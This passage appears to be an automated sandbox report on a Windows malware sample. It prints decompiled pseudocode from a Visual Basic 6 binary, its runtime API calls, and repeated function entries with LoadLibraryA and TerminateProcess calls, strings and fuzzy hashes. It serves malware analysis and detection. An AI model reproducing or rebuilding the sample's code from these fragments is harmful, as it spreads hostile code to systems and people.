					_v188 = _v44;
					_v44 = _v44 & 0x00000000;
					_v56 = _v188;
					_v64 = 8;
					_v120 = 0xdd;
					_v128 = 2;
					L004012B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004012B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t136 =  *((intOrPtr*)( *_v172 + 0x38))(_v172, 0x10, 0x10,  &_v80);
					asm("fclex");
					_v176 = _t136;
					if(_v176 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x40b234);
						_push(_v172);
						_push(_v176);
						L0040140C();
						_v204 = _t136;
					}
					L00401406();
					_push( &_v80);
					_push( &_v64);
					_push(2);
					L00401424();
					_t159 = _t159 + 0xc;
				}
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0xc;
				_v64 = 2;
				_push(1);
				_push(1);
				_push( &_v80);
				_push( &_v64);
				_push( &_v96); // executed
				L00401346(); // executed
				_v152 = 0xc;
				_v160 = 0x8002;
				_push( &_v96);
				_t107 =  &_v160;
				_push(_t107);
				L00401436();
				_v164 = _t107;
				_push( &_v96);
				_push( &_v80);
				_push( &_v64);
				_push(3);
				L00401424();
				_t111 = _v164;
				if(_t111 != 0) {
					if( *0x4112d4 != 0) {
						_v208 = 0x4112d4;
					} else {
						_push(0x4112d4);
						_push(0x40b244);
						L00401412();
						_v208 = 0x4112d4;
					}
					_v164 =  *_v208;
					_t115 =  &_v64;
					L00401376();
					L0040137C();
					_t116 =  &_v48;
					L00401382();
					_t111 =  *((intOrPtr*)( *_v164 + 0xc))(_v164, _t116, _t116, _t115, _t115, _t115,  &_v40, L"UGDpQf5OBj3KDU76", 0);
					asm("fclex");
					_v168 = _t111;
					if(_v168 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0xc);
						_push(0x40b234);
						_push(_v164);
						_push(_v168);
						L0040140C();
						_v212 = _t111;
					}
					L00401406();
					L00401418();
				}
				_push(E004108DD);
				L00401418();
				return _t111;
			}

0x00410549
0x00410558
0x00410564
0x0041056c
0x0041056f
0x00410576
0x00410585
0x00410588
0x0041058a
0x00410594
0x00410599
0x0041059a
0x0041059f
0x004105a6
0x004105ac
0x004105b6
0x004105c4
0x004105d1
0x004105ee
0x004105d3
0x004105d3
0x004105d8
0x004105dd
0x004105e2
0x004105e2
0x00410612
0x00410616
0x0041061b
0x00410633
0x00410639
0x0041063b
0x00410648
0x0041066d
0x0041064a
0x0041064a
0x0041064f
0x00410654
0x0041065a
0x00410660
0x00410665
0x00410665
0x0041067b
0x00410698
0x0041067d
0x0041067d
0x00410682
0x00410687
0x0041068c
0x0041068c
0x004106aa
0x004106b3
0x004106b9
0x004106c3
0x004106c6
0x004106cd
0x004106d4
0x004106e2
0x004106ec
0x004106ed
0x004106ee
0x004106ef
0x004106f3
0x004106fd
0x004106fe
0x004106ff
0x00410700
0x0041070f
0x00410712
0x00410714
0x00410721
0x00410743
0x00410723
0x00410723
0x00410725
0x0041072a
0x00410730
0x00410736
0x0041073b
0x0041073b
0x0041074d
0x00410755
0x00410759
0x0041075a
0x0041075c
0x00410761
0x00410761
0x00410764
0x0041076b
0x00410772
0x00410779
0x00410780
0x00410782
0x00410787
0x0041078b
0x0041078f
0x00410790
0x00410795
0x0041079f
0x004107ac
0x004107ad
0x004107b3
0x004107b4
0x004107b9
0x004107c3
0x004107c7
0x004107cb
0x004107cc
0x004107ce
0x004107d6
0x004107df
0x004107ec
0x00410809
0x004107ee
0x004107ee
0x004107f3
0x004107f8
0x004107fd
0x004107fd
0x0041081b
0x0041082c
0x00410830
0x00410839
0x0041083f
0x00410843
0x00410857
0x0041085a
0x0041085c
0x00410869
0x0041088b
0x0041086b
0x0041086b
0x0041086d
0x00410872
0x00410878
0x0041087e
0x00410883
0x00410883
0x00410895
0x0041089d
0x0041089d
0x004108a2
0x004108d7
0x004108dc

APIs

__vbaChkstk.MSVBVM60(?,004012B6), ref: 00410564
#525.MSVBVM60(00000001,?,?,?,?,004012B6), ref: 0041058A
__vbaStrMove.MSVBVM60(00000001,?,?,?,?,004012B6), ref: 00410594
__vbaStrCmp.MSVBVM60(0040B5F8,00000000,00000001,?,?,?,?,004012B6), ref: 0041059F
__vbaFreeStr.MSVBVM60(0040B5F8,00000000,00000001,?,?,?,?,004012B6), ref: 004105B6
__vbaNew2.MSVBVM60(0040B81C,00411010,0040B5F8,00000000,00000001,?,?,?,?,004012B6), ref: 004105DD
__vbaObjSet.MSVBVM60(0040B5F8,00000000), ref: 00410616
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000108), ref: 00410660
__vbaNew2.MSVBVM60(0040B244,004112D4), ref: 00410687
__vbaChkstk.MSVBVM60(?), ref: 004106E2
__vbaChkstk.MSVBVM60(?), ref: 004106F3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B234,00000038), ref: 00410736
__vbaFreeObj.MSVBVM60(00000000,?,0040B234,00000038), ref: 0041074D
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0041075C
#660.MSVBVM60(?,00000002,0000000A,00000001,00000001), ref: 00410790
__vbaVarTstNe.MSVBVM60(00008002,?), ref: 004107B4
__vbaFreeVarList.MSVBVM60(00000003,00000002,0000000A,?,00008002,?), ref: 004107CE
__vbaNew2.MSVBVM60(0040B244,004112D4,?,?,?,004012B6), ref: 004107F8
__vbaVarLateMemCallLd.MSVBVM60(?,?,UGDpQf5OBj3KDU76,00000000), ref: 00410830
__vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,004012B6), ref: 00410839
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,004012B6), ref: 00410843
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B234,0000000C), ref: 0041087E
__vbaFreeObj.MSVBVM60(00000000,?,0040B234,0000000C), ref: 00410895
__vbaFreeVar.MSVBVM60(00000000,?,0040B234,0000000C), ref: 0041089D
__vbaFreeVar.MSVBVM60(004108DD,?,?,?,004012B6), ref: 004108D7

Strings

UGDpQf5OBj3KDU76, xrefs: 00410823

Memory Dump Source

Source File: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckChkstkHresultNew2$List$#525#660AddrefCallLateMove
String ID: UGDpQf5OBj3KDU76
API String ID: 1925459657-3051437408
Opcode ID: 6b7acfae4494e92ea25dca80496520da2065a927930a2f1fa1f2e46b27fc1ad9
Instruction ID: fdc3fcfdffac369abea73e864d047281ea055ad0a913b6f4316ba562ce69ab42
Opcode Fuzzy Hash: 6b7acfae4494e92ea25dca80496520da2065a927930a2f1fa1f2e46b27fc1ad9
Instruction Fuzzy Hash: C7910971D00218EFDB10EF95C845FDEB7B8AF09304F1081AAE549B72A1DBB85A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 021C07E7, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 304COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

8Wh, xrefs: 021C09A9
6<, xrefs: 021C0974
ZU, xrefs: 021C09EF
M", xrefs: 021C08D7
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: 8Wh$6<$M"$ZU$v:
API String ID: 3349790660-685311920
Opcode ID: cc45d3eab9650274d213a3f8abc1dd5e23fd0acfaff569f9432701d4c5ef777c
Instruction ID: 4f19e1227f8a9710729d5b3d2823667366616a70f29191f407595d94a9a910a0
Opcode Fuzzy Hash: cc45d3eab9650274d213a3f8abc1dd5e23fd0acfaff569f9432701d4c5ef777c
Instruction Fuzzy Hash: 1F91E23CAC4301EBEF3815288CA57FA22575FB6364FBA412DDCA6A71D4D778D485CA02

Uniqueness

Uniqueness Score: -1.00%

Function 021C0818, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

8Wh, xrefs: 021C09A9
6<, xrefs: 021C0974
ZU, xrefs: 021C09EF
M", xrefs: 021C08D7
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: 8Wh$6<$M"$ZU$v:
API String ID: 3349790660-685311920
Opcode ID: fbc2d1b6eed1eaf1906fe1950abf357412c2a311c7d1f350108b9c9fd61fc8a7
Instruction ID: d8305dc835068d5dbf25e4ff3e785c1698faa0a394991ddd9787cd7ed67c5934
Opcode Fuzzy Hash: fbc2d1b6eed1eaf1906fe1950abf357412c2a311c7d1f350108b9c9fd61fc8a7
Instruction Fuzzy Hash: 05517B3CAC8301EAEF3C152849A57FE11174FBA354F76412EDDA7A20D4C778D881C952

Uniqueness

Uniqueness Score: -1.00%

Function 021C085A, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 196COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

8Wh, xrefs: 021C09A9
6<, xrefs: 021C0974
ZU, xrefs: 021C09EF
M", xrefs: 021C08D7
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: 8Wh$6<$M"$ZU$v:
API String ID: 3349790660-685311920
Opcode ID: dcdd2521c9b98b44977b8321af1b508ab6cef7303c150dc1eca85b9456c2f589
Instruction ID: 9417db3d123f2fb889ff92a143c789682616301854bef4d32b711aa56aab2be1
Opcode Fuzzy Hash: dcdd2521c9b98b44977b8321af1b508ab6cef7303c150dc1eca85b9456c2f589
Instruction Fuzzy Hash: 4A517C3CAC4301EAEE3C192848A57FE11174FB9394FB6411EDDABA30D4C779D885C912

Uniqueness

Uniqueness Score: -1.00%

Function 021C0891, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

8Wh, xrefs: 021C09A9
6<, xrefs: 021C0974
ZU, xrefs: 021C09EF
M", xrefs: 021C08D7
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: 8Wh$6<$M"$ZU$v:
API String ID: 3349790660-685311920
Opcode ID: e363c954fb806adddc9d08f833de363c95dd75c87a086cf4ecd065b9acb7e4a4
Instruction ID: 688e67b1ec72bd13a68f3b07b7698b83eb1ce0737977f3564d6f45f0d1c1c5fa
Opcode Fuzzy Hash: e363c954fb806adddc9d08f833de363c95dd75c87a086cf4ecd065b9acb7e4a4
Instruction Fuzzy Hash: 26516C3CAC8301EAEE3C192849A57FE11274FB9394F76411EDDABA30D4C779D885C952

Uniqueness

Uniqueness Score: -1.00%

Function 021C0894, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

8Wh, xrefs: 021C09A9
6<, xrefs: 021C0974
ZU, xrefs: 021C09EF
M", xrefs: 021C08D7
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: 8Wh$6<$M"$ZU$v:
API String ID: 3349790660-685311920
Opcode ID: 69e95c527a8fcff5f938b9522c9d6ab1b2c748739da2f679327a51e4766bd73a
Instruction ID: 39a9cba0b7e84ca3fd0992248dbc19980dd2b3aecaa15a80936120cc3db2bed0
Opcode Fuzzy Hash: 69e95c527a8fcff5f938b9522c9d6ab1b2c748739da2f679327a51e4766bd73a
Instruction Fuzzy Hash: 2E51693CAC4305EAEF3C192849A5BFE11274FB9794F76411EDDAAA30D4D739D882C912

Uniqueness

Uniqueness Score: -1.00%

Function 021C08BD, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

8Wh, xrefs: 021C09A9
6<, xrefs: 021C0974
ZU, xrefs: 021C09EF
M", xrefs: 021C08D7
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: 8Wh$6<$M"$ZU$v:
API String ID: 3349790660-685311920
Opcode ID: 841168da61dfadf0c0adc99bec0f9049b5b79b09193010906294ae46be04ec28
Instruction ID: c17ebc006ba9c24931547dcd9f19e35115307d1563db56a451b2e6d03e42471b
Opcode Fuzzy Hash: 841168da61dfadf0c0adc99bec0f9049b5b79b09193010906294ae46be04ec28
Instruction Fuzzy Hash: 33518C3CAC4305EAEF3C19284CA5BEE11174FB9354F76411DDDAAA30D4C739D881C912

Uniqueness

Uniqueness Score: -1.00%

Function 021C0909, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 174COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

8Wh, xrefs: 021C09A9
6<, xrefs: 021C0974
ZU, xrefs: 021C09EF
M", xrefs: 021C08D7
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: 8Wh$6<$M"$ZU$v:
API String ID: 3349790660-685311920
Opcode ID: fb7491a8bd6bbd20f01eb4093efa244fc03dec5616e4a5e8e16606735a298802
Instruction ID: afba9cb29e90946b73408fd15c01b56aa9b4a748d3b6e83941720a25e8f3a03a
Opcode Fuzzy Hash: fb7491a8bd6bbd20f01eb4093efa244fc03dec5616e4a5e8e16606735a298802
Instruction Fuzzy Hash: AB417C3CAC4305EAEF3C192848A5BFE11274FB9754F76411EDDAA620D4C779D886C912

Uniqueness

Uniqueness Score: -1.00%

Function 021C08E0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 173COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

8Wh, xrefs: 021C09A9
6<, xrefs: 021C0974
ZU, xrefs: 021C09EF
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: 8Wh$6<$ZU$v:
API String ID: 3349790660-1063205172
Opcode ID: fb57683178e6db2183377f447edcb87346532566784f85280fc88ab0873c2248
Instruction ID: b95a4511f905234888da6423e2d7e2209c50bc3e4489d35a3a05c8c22f6c9bbf
Opcode Fuzzy Hash: fb57683178e6db2183377f447edcb87346532566784f85280fc88ab0873c2248
Instruction Fuzzy Hash: 21417C3CAC4301EAEF3C19288CA5BEE12274FB9354F76411DDDAA630D4C779D886C912

Uniqueness

Uniqueness Score: -1.00%

Function 021C090C, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 164COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

8Wh, xrefs: 021C09A9
6<, xrefs: 021C0974
ZU, xrefs: 021C09EF
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: 8Wh$6<$ZU$v:
API String ID: 3349790660-1063205172
Opcode ID: c7af5679d47432ea9b8044c80bdce52b069b0ae9a6ecb318511fce2bf0886e51
Instruction ID: 1e2a2b4792d555d5e249c6b9e05ff290ff748e438628081e97c9aa3973a4c4e1
Opcode Fuzzy Hash: c7af5679d47432ea9b8044c80bdce52b069b0ae9a6ecb318511fce2bf0886e51
Instruction Fuzzy Hash: 9B418D3C6C4301EAEE3C19284CA5BFE11274FB9754FB6411DDDAA620D4C779D885C912

Uniqueness

Uniqueness Score: -1.00%

Function 021C092D, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 157COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Strings

8Wh, xrefs: 021C09A9
6<, xrefs: 021C0974
ZU, xrefs: 021C09EF
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: 8Wh$6<$ZU$v:
API String ID: 3349790660-1063205172
Opcode ID: 82748abeb69dc68200baa3f38de688a57a0c24072f47f4b1030652f3760bc492
Instruction ID: 8b1a231f5083f9f99fe91be864c946d105beb5bd0e247c06144aa88be10902ee
Opcode Fuzzy Hash: 82748abeb69dc68200baa3f38de688a57a0c24072f47f4b1030652f3760bc492
Instruction Fuzzy Hash: D8416D3CAC4301EAEE3C192C8D95BEE12274FB5354F76411DDCAA630D4D779D886C512

Uniqueness

Uniqueness Score: -1.00%

Function 021C0962, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

8Wh, xrefs: 021C09A9
6<, xrefs: 021C0974
ZU, xrefs: 021C09EF
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: 8Wh$6<$ZU$v:
API String ID: 3349790660-1063205172
Opcode ID: 8b4e60ec8ed3b2929d250c85e488b514e15d0aa2d7d084dbf9d1be94614d4206
Instruction ID: b5a9c0d3ba468a6f1cbca62816a1767695da7904c968b62fddb5cf9491050307
Opcode Fuzzy Hash: 8b4e60ec8ed3b2929d250c85e488b514e15d0aa2d7d084dbf9d1be94614d4206
Instruction Fuzzy Hash: A4417E3CAC4301EAEE3C151C8DA5BFA11274FB93A4FBA411DDDAA630D4D779D886C512

Uniqueness

Uniqueness Score: -1.00%

Function 021C0995, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

8Wh, xrefs: 021C09A9
6<, xrefs: 021C0974
ZU, xrefs: 021C09EF
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: 8Wh$6<$ZU$v:
API String ID: 3349790660-1063205172
Opcode ID: 6654ba2627eac3ec9416bad51e28359509611a99f15d12cf6429ca6fa359ac3e
Instruction ID: 0a992983dac3aabd4ef8af71e9436617fdf9b5586cc96e22190050a1ce8c2032
Opcode Fuzzy Hash: 6654ba2627eac3ec9416bad51e28359509611a99f15d12cf6429ca6fa359ac3e
Instruction Fuzzy Hash: 25417C3CAC8301FAEE3C151C4DA5BFA11274FBA3A4F76410DDDAA620D4C779D886C512

Uniqueness

Uniqueness Score: -1.00%

Function 021C0998, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

8Wh, xrefs: 021C09A9
ZU, xrefs: 021C09EF
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID: 8Wh$ZU$v:
API String ID: 560597551-2587092122
Opcode ID: 3695444b8a8bef9aa8eb306d371c7f715b7a6365a02a6bcc9875e9a1d7fb3632
Instruction ID: 140ec699a972c9ec3b068a022c44e296d0e8ad571612dcaf86f31be58760b1bb
Opcode Fuzzy Hash: 3695444b8a8bef9aa8eb306d371c7f715b7a6365a02a6bcc9875e9a1d7fb3632
Instruction Fuzzy Hash: 38318C3CAC4301FAEE3C051C8DA5BFA11274FB9364F76410DDDAAA20D4D778D886C912

Uniqueness

Uniqueness Score: -1.00%

Function 021C09B7, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

ZU, xrefs: 021C09EF
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID: ZU$v:
API String ID: 560597551-2916096910
Opcode ID: 22770e738e4c17824aa2a67ddc6a6771a5a6fb39945a4b1ad0ddadc150c90165
Instruction ID: fbf2a19eed244e92dbe6f6b2a154b576872eda0ccd320dfb0544cb365764c4d4
Opcode Fuzzy Hash: 22770e738e4c17824aa2a67ddc6a6771a5a6fb39945a4b1ad0ddadc150c90165
Instruction Fuzzy Hash: BB31AD3C6C4301FAEE3C152C89A5BFA21274F79364F76520DDDAAA20E4C738D886C912

Uniqueness

Uniqueness Score: -1.00%

Function 021C09E1, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

ZU, xrefs: 021C09EF
v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID: ZU$v:
API String ID: 560597551-2916096910
Opcode ID: 418da8ec52c0120d9ed56ce7e7885fca2e6e353294a01e293cbeb3a42266f430
Instruction ID: 201d21bdc97f7d2af8f3259f53ee37c5bd4e8171d9e5f7137a1257b50b79e868
Opcode Fuzzy Hash: 418da8ec52c0120d9ed56ce7e7885fca2e6e353294a01e293cbeb3a42266f430
Instruction Fuzzy Hash: 57317D3CAC4301EADE3C151C89A57FA12574F79364F7A521EDDA6A20D4C738D4868912

Uniqueness

Uniqueness Score: -1.00%

Function 021C12CF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

`, xrefs: 021C142E

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: e35cb95e728212eff6556427746f9f61f880c085bc8ea16b6b1c3222a04967d9
Instruction ID: aae8ddb62fbe70191963145731e02786d690d38ca894e3e3e8cade7e60ad206f
Opcode Fuzzy Hash: e35cb95e728212eff6556427746f9f61f880c085bc8ea16b6b1c3222a04967d9
Instruction Fuzzy Hash: 5E31241C6CD351EDFB2C25644E347FA15675FB37B0FBA512EEC2A4304AA7244484CA42

Uniqueness

Uniqueness Score: -1.00%

Function 021C0A09, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID: v:
API String ID: 560597551-1532531550
Opcode ID: 36de6b0c94f10b1628a88fb636a5571d988a98290ad3102ee7fb3d1f1c5d4263
Instruction ID: 5cf1396c501bf0b330e1100ad5066dbe338fbb4295b667694e61ce010a280d73
Opcode Fuzzy Hash: 36de6b0c94f10b1628a88fb636a5571d988a98290ad3102ee7fb3d1f1c5d4263
Instruction Fuzzy Hash: 6531AE3CAC8301EAEE3C152C49A5BFE21574FB9364F79521EDCA7A20D4D778D4C58812

Uniqueness

Uniqueness Score: -1.00%

Function 021C0A37, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID: v:
API String ID: 560597551-1532531550
Opcode ID: a5b7d872a4b39ac3c976863ab46f5ee2419250e249b8d3bf8f3ba68634990877
Instruction ID: 8f3dfd078b9d2886b510a3b119005956ee3bcac87a4f3183ae812676509b987e
Opcode Fuzzy Hash: a5b7d872a4b39ac3c976863ab46f5ee2419250e249b8d3bf8f3ba68634990877
Instruction Fuzzy Hash: AD218E3CAC4304EAEE3C091C49A5BFA22534F79324FB9521EDD77A60E5D778E4C68912

Uniqueness

Uniqueness Score: -1.00%

Function 021C0A6D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
